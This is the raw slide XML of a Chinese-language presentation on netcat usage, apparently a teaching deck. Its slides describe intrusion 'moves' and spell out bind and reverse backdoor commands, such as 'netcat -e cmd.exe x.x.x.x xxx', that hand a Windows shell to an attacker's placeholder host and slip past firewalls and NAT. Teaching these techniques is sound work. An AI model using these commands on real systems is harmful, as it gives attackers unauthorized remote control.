            <a:off x="755650" y="3724275"/>
            <a:ext cx="7763510" cy="1014095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后门创建好之后，攻击者在自己机器上也运行 nc（客户端 nc），然后连接到作为后门的 nc（服务端 nc）。一旦连上之后，攻击者就可以在自己的 nc 上看到对方（受害者机器）的 shell 提示符。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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 name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="1059815"/>
            <a:ext cx="7895590" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1046766"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755393" y="1633231"/>
            <a:ext cx="7774471" cy="737235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果受害者是 Windows 系统，只须如下命令就可以开启一个后门（其中的 xxx 是端口号）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="1179195"/>
            <a:ext cx="5602605" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -l -p xxx -e cmd.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1782445" y="3148330"/>
            <a:ext cx="6515735" cy="412750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> x.x.x.x xxx</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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直角三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>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书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3275965" y="1203960"/>
            <a:ext cx="5490845" cy="3108960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>原理其实与 “招数8” 很类似，唯一的差别在于——把客户端与服务端【对调】。也就是说，攻击者手头的 nc 充当服务端，而受害者机器上的 nc 充当客户端。此时，受害者本机的 nc【无须】开启监听端口，【不受】防火墙的影响，也【不受】NAT 的影响。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786130" y="446405"/>
            <a:ext cx="7358380" cy="868680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>招数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：（入侵手法）用 nc 开启【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>主动】连接型后门</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="5" grpId="0"/>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24205" y="3075940"/>
            <a:ext cx="7879715" cy="1922145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="3724275"/>
            <a:ext cx="7763510" cy="1014095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果受害者是 Windows 系统，只须如下命令就可以开启一个后门。</a:t>
            </a:r>
            <a:endParaRPr sz="1400" spc="6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 name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624205" y="1059815"/>
            <a:ext cx="7895590" cy="1952625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1046766"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755393" y="1633231"/>
            <a:ext cx="7774471" cy="1060450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　既然 nc 的“服务端”与“客户端”对调。因此攻击者要先在自己机器上运行“服务端 nc”，命令如下（其中的 xxx 是端口号）。当然啦，攻击者自己电脑的防火墙需要允许xxx端口号对外监听。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695575" y="1179195"/>
            <a:ext cx="5602605" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -lk -p xxx</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710180" y="3275965"/>
            <a:ext cx="5588000" cy="448310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e cmd.exe x.x.x.x xxx</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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nector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4546594" y="-1074993"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4675046"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="Connector: Elbow 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572628" y="1372532"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4595125"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
